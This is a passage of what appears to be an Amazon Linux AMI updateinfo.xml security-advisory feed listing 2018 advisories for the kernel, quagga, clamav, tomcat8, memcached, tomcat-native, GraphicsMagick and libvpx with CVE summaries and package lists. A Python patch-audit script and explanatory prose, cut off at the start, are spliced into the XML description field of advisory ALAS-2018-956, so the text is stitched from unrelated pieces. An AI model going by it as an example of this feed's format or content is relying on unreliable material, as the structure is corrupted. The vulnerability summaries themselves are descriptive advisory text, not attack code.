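            installed[(name, arch)] = ("0" if epoch == "(none)" else epoch, ver, rel)
    return installed

def missing_updates(advisories, installed):
    """[(advisory id, name, arch, installed evr, fixed evr)] for each shipped package
    installed at an older evr. Packages not installed at all do not count."""
    gaps = []
    for adv in advisories:
        for name, epoch, ver, rel, arch in adv["packages"]:
            have = installed.get((name, arch))
            if have is not None and evr_cmp(have, (epoch, ver, rel)) == -1:
                gaps.append((adv["id"], name, arch, have, (epoch, ver, rel)))
    return gaps

def build_sample():
    """Constructed update element shaped like ALAS-2018-956 (kernel 4.9.81-35.56.amzn1)."""
    root = ET.Element("updates")
    upd = ET.SubElement(root, "update", type="security")
    ET.SubElement(upd, "id").text = "ALAS-2018-956"
    ET.SubElement(upd, "severity").text = "important"
    refs = ET.SubElement(upd, "references")
    for cve in ("CVE-2017-5753", "CVE-2018-1000028"):
        ET.SubElement(refs, "reference", id=cve, type="cve")
    coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
    for name in ("kernel", "kernel-headers"):
        ET.SubElement(coll, "package", name=name, epoch="0", version="4.9.81",
                      release="35.56.amzn1", arch="x86_64")
    return root

# Constructed rpm -qa output: kernel is behind the advisory, kernel-headers is current.
SAMPLE_RPM_QA = """kernel x86_64 (none) 4.9.76 3.78.amzn1
kernel-headers x86_64 (none) 4.9.81 35.56.amzn1
openssl x86_64 1 1.0.2k 12.109.amzn1
"""

if __name__ == "__main__":
    # On a host: root = ET.parse("/var/cache/yum/x86_64/latest/amzn-updates/gen/updateinfo.xml").getroot()
    for gap in missing_updates(list(parse_updateinfo(build_sample())), parse_rpm_qa(SAMPLE_RPM_QA)):
        print(gap)
```

Two details matter in practice: the epoch must take part in the comparison (mod_ssl and bind in this feed carry non-zero epochs, and a version string alone would order them wrongly), and for kernel packages rpm keeps several versions installed side by side, so the check should look at the running kernel (uname -r) rather than only the newest installed package.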
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405" title="" id="CVE-2017-1000405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17741" title="" id="CVE-2017-17741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753" title="" id="CVE-2017-5753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000028" title="" id="CVE-2018-1000028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5344" title="" id="CVE-2018-5344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5750" title="" id="CVE-2018-5750" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.81" release="35.56.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.81-35.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.81" release="35.56.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-devel-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.81" release="35.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.81-35.56.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.81" release="35.56.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.81-35.56.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-957</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-957: important priority package update for quagga</title><issued date="2018-02-20 21:26:00" /><updated date="2018-02-21 20:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5381:
An infinite loop vulnerability was discovered in Quagga. A BGP peer could send specially crafted packets that would cause the daemon to enter an infinite loop, denying service and consuming CPU until it is restarted.
1542992:
CVE-2018-5381 quagga: Infinite loop issue triggered by invalid OPEN message allows denial-of-service
CVE-2018-5380:
A vulnerability was found in Quagga, in the log formatting code. Specially crafted messages sent by BGP peers could cause Quagga to read one element past the end of certain static arrays, causing arbitrary binary data to appear in the logs or potentially, a crash.
1542990:
CVE-2018-5380 quagga: bgpd can overrun internal BGP code-to-string conversion tables potentially allowing crash
CVE-2018-5379:
A double-free vulnerability was found in Quagga. A BGP peer could send a specially crafted UPDATE message which would cause allocated blocks of memory to be free()d more than once, potentially leading to a crash or other issues.
1542985:
CVE-2018-5379 quagga: Double free vulnerability in bgpd when processing certain forms of UPDATE message allowing to crash or potentially execute arbitrary code
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5379" title="" id="CVE-2018-5379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5380" title="" id="CVE-2018-5380" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5381" title="" id="CVE-2018-5381" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="quagga-devel" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-contrib" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.22.4-4.17.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.22.4-4.17.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.22.4" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.22.4-4.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-958</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-958: medium priority package update for clamav</title><issued date="2018-02-20 21:35:00" /><updated date="2018-02-21 20:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6420:
CVE-2017-6419:
mspack/lzxd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2, allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted CHM file.
1483909:
CVE-2017-6419 libmspack, clamav: heap-based buffer overflow in mspack/lzxd.c
CVE-2017-6418:
CVE-2017-12380:
CVE-2017-12379:
CVE-2017-12378:
CVE-2017-12377:
CVE-2017-12376:
CVE-2017-12375:
CVE-2017-12374:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12374" title="" id="CVE-2017-12374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12375" title="" id="CVE-2017-12375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12376" title="" id="CVE-2017-12376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12377" title="" id="CVE-2017-12377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12378" title="" id="CVE-2017-12378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12379" title="" id="CVE-2017-12379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12380" title="" id="CVE-2017-12380" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6418" title="" id="CVE-2017-6418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6419" title="" id="CVE-2017-6419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6420" title="" id="CVE-2017-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.99.3" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/clamav-devel-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.99.3" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.99.3-1.28.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.99.3" release="1.28.amzn1" epoch="0" 
arch="noarch"><filename>Packages/clamav-filesystem-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.99.3" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.99.3-1.28.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamd" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.99.3-1.28.amzn1.i686.rpm</filename></package><package name="clamav" version="0.99.3" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.99.3-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-959</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2018-959: low priority package update for tomcat8</title><issued date="2018-02-20 21:37:00" /><updated date="2018-02-21 20:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.28" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.28-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.28" release="1.76.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-log4j-8.5.28-1.76.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-964</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-964: medium priority package update for memcached</title><issued date="2018-03-07 21:14:00" /><updated date="2018-05-10 23:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000115:
It was discovered that the memcached connections using UDP transport protocol can be abused for efficient traffic amplification distributed denial of service (DDoS) attacks. A remote attacker could send a malicious UDP request using a spoofed source IP address of a target system to memcached, causing it to send a significantly larger response to the target.
1551182:
CVE-2018-1000115 memcached: UDP server support allows spoofed traffic amplification DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000115" title="" id="CVE-2018-1000115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="memcached-debuginfo" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-debuginfo-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-devel-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-1.4.15-10.15.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-1.4.15-10.15.amzn1.i686.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-debuginfo-1.4.15-10.15.amzn1.i686.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-devel-1.4.15-10.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-965</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-965: medium priority package update for tomcat-native</title><issued date="2018-03-07 21:16:00" /><updated date="2018-03-08 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15698:
When parsing the AIA-Extension field of a client certificate, Apache Tomcat Native Connector 1.2.0 to 1.2.14 and 1.1.23 to 1.1.34 did not correctly handle fields longer than 127 bytes. The result of the parsing error was to skip the OCSP check. It was therefore possible for client certificates that should have been rejected (if the OCSP check had been made) to be accepted. Users not using OCSP checks are not affected by this vulnerability.
1540824:
CVE-2017-15698 tomcat-native: Mishandling of client certificates can allow for OCSP check bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15698" title="" id="CVE-2017-15698" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat-native" version="1.2.16" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/tomcat-native-1.2.16-1.20.amzn1.x86_64.rpm</filename></package><package name="tomcat-native-debuginfo" version="1.2.16" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/tomcat-native-debuginfo-1.2.16-1.20.amzn1.x86_64.rpm</filename></package><package name="tomcat-native" version="1.2.16" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/tomcat-native-1.2.16-1.20.amzn1.i686.rpm</filename></package><package name="tomcat-native-debuginfo" version="1.2.16" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/tomcat-native-debuginfo-1.2.16-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-966</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-966: important priority package update for GraphicsMagick</title><issued date="2018-03-07 21:35:00" /><updated date="2018-03-08 22:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5685:
CVE-2017-17915:
CVE-2017-17913:
CVE-2017-17912:
CVE-2017-17783:
CVE-2017-17782:
CVE-2017-16669:
CVE-2017-16353:
GraphicsMagick 1.3.26 is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file. There is an out-of-bounds buffer dereference because certain increments are never checked.
1512047:
CVE-2017-16353 ImageMagick, GraphicsMagick: memory information disclosure in DescribeImage function in magick/describe.c
CVE-2017-13147:
CVE-2017-11643:
CVE-2017-11641:
CVE-2017-11637:
CVE-2017-11636:
CVE-2017-11140:
CVE-2017-11139:
CVE-2017-11102:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11102" title="" id="CVE-2017-11102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11139" title="" id="CVE-2017-11139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11140" title="" id="CVE-2017-11140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11636" title="" id="CVE-2017-11636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11637" title="" id="CVE-2017-11637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11641" title="" id="CVE-2017-11641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11643" title="" id="CVE-2017-11643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13147" title="" id="CVE-2017-13147" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16353" title="" id="CVE-2017-16353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16669" title="" id="CVE-2017-16669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17782" title="" id="CVE-2017-17782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17783" title="" id="CVE-2017-17783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17912" title="" id="CVE-2017-17912" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17913" title="" id="CVE-2017-17913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17915" title="" id="CVE-2017-17915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5685" title="" id="CVE-2018-5685" type="cve" /></references><pkglist><collection 
short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.28" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.28-1.12.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.28" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.28-1.12.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.28" release="1.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.28" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-967</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-967: low priority package update for libvpx</title><issued date="2018-03-07 21:36:00" /><updated date="2018-03-08 22:18:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-13194:
A vulnerability in the Android media framework (libvpx) related to odd frame width. Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-64710201.
1535183:
CVE-2017-13194 libvpx: denial of service (DoS) in vpx/src/vpx_image.c file
